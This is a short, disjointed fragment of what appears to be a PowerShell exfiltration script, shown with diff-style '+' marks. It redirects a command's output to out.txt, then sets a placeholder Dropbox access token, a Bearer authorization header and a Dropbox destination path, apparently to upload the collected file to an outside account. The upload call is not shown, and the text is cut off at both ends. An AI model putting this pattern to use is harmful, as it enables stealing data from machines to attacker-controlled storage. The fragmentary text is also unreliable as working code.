/f /a > out.txt + $filePath=".\out.txt"; + $accessToken="#DROPBOX_ACCESS_TOKEN" $authHeader = @{Authorization = "Bearer $accessToken"} $dropboxFilePath = "/out_exported.txt"